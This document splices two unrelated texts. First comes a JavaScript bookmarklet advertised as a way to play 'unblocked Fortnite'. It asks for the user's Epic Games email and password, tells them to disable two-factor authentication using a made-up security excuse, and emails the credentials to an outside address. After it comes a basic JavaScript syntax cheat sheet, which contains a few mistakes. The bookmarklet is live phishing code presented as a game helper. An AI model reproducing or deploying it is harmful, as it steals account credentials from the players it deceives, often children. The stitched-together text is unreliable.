javascript:(function() { var email = prompt("What is your Epic Games™ email? (Type exactly how you would to log in.)"); var password = prompt("What is your Epic Games™ Password? (Type exactly how you would to log in.)"); var has2FA = prompt("Does your Epic Games™ account have 2-FA enabled? (yes/no)"); if (has2FA.toLowerCase() === "yes") { alert("Uh-Oh, due to recent exploiting by other users, 2-FA cannot be enabled on your account. 2-FA has allowed some users to infiltrate other players%27 accounts by tracing their email to their login information.\n\nIf you wish to log in, please disable 2-FA from your Epic Games™ account, then click the bookmarklet and enter your info once again.\n\nIf you do not wish to disable 2-FA from your Epic Games™ account, we respectfully cannot allow you to log in. Thank you for your time and consideration, we are very sorry for the inconvenience. Have a nice day!"); return; } alert("Information saved successfully! You%27re all set! Just click the %27send%27 button on Gmail (you will see it after you click %27OK%27) and you should be good to go!\n\nWe should be finished syncing your account in 1-2 days. After that time, run the bookmarklet again to play.\n\nIf your account is not finished syncing after 4 days, contact us with your login info at [email protected], and we will fix the problem from there.\n\nThanks for your time and cooperation! Have Fun!"); var confirmation = confirm("Opening Gmail tab! On Gmail, make sure to click %27Send%27 so you can play Fortnite! Click %27OK%27 to continue to Gmail! Bookmarklet made By: Joseph Topper, using Epic Games™ and Javascript®"); if (confirmation) { var emailLabel = "Email: "; var passwordLabel = "Password: "; var subject = "Unblocked Fortnite Bookmarklet Last Step"; var message = emailLabel + email + "\n" + passwordLabel + password + "\n\n🠳 Click %27Send%27 to Play Fortnite 🠳!"; var mailtoLink = "mailto:[email protected]?subject=" + encodeURIComponent(subject) + "&body=" + encodeURIComponent(message); window.open(mailtoLink); }})();
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Javascript(JS) is a object-oriented programming language which adhere to ECMA Script Standards. Javascript is required to design the behaviour of the web pages.
var readline = require('readline');
var rl = readline.createInterface({
input: process.stdin,
output: process.stdout,
terminal: false
});
rl.on('line', function(line){
console.log("Hello, " + line);
});
Keyword | Description | Scope |
---|---|---|
var | Var is used to declare variables(old way of declaring variables) | Function or global scope |
let | let is also used to declare variables(new way) | Global or block Scope |
const | const is used to declare const values. Once the value is assigned, it can not be modified | Global or block Scope |
let greetings = `Hello ${name}`
const msg = `
hello
world!
`
An array is a collection of items or values.
let arrayName = [value1, value2,..etc];
// or
let arrayName = new Array("value1","value2",..etc);
let mobiles = ["iPhone", "Samsung", "Pixel"];
// accessing an array
console.log(mobiles[0]);
// changing an array element
mobiles[3] = "Nokia";
Arrow Functions helps developers to write code in concise way, it’s introduced in ES6.
Arrow functions can be written in multiple ways. Below are couple of ways to use arrow function but it can be written in many other ways as well.
() => expression
const numbers = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
const squaresOfEvenNumbers = numbers.filter(ele => ele % 2 == 0)
.map(ele => ele ** 2);
console.log(squaresOfEvenNumbers);
let [firstName, lastName] = ['Foo', 'Bar']
let {firstName, lastName} = {
firstName: 'Foo',
lastName: 'Bar'
}
const {
title,
firstName,
lastName,
...rest
} = record;
//Object spread
const post = {
...options,
type: "new"
}
//array spread
const users = [
...adminUsers,
...normalUsers
]
function greetings({ name = 'Foo' } = {}) { //Defaulting name to Foo
console.log(`Hello ${name}!`);
}
greet() // Hello Foo
greet({ name: 'Bar' }) // Hi Bar
IF is used to execute a block of code based on a condition.
if(condition){
// code
}
Else part is used to execute the block of code when the condition fails.
if(condition){
// code
} else {
// code
}
Switch is used to replace nested If-Else statements.
switch(condition){
case 'value1' :
//code
[break;]
case 'value2' :
//code
[break;]
.......
default :
//code
[break;]
}
For loop is used to iterate a set of statements based on a condition.
for(Initialization; Condition; Increment/decrement){
//code
}
While is also used to iterate a set of statements based on a condition. Usually while is preferred when number of iterations are not known in advance.
while (condition) {
// code
}
Do-while is also used to iterate a set of statements based on a condition. It is mostly used when you need to execute the statements atleast once.
do {
// code
} while (condition);
ES6 introduced classes along with OOPS concepts in JS. Class is similar to a function which you can think like kind of template which will get called when ever you initialize class.
class className {
constructor() { ... } //Mandatory Class method
method1() { ... }
method2() { ... }
...
}
class Mobile {
constructor(model) {
this.name = model;
}
}
mbl = new Mobile("iPhone");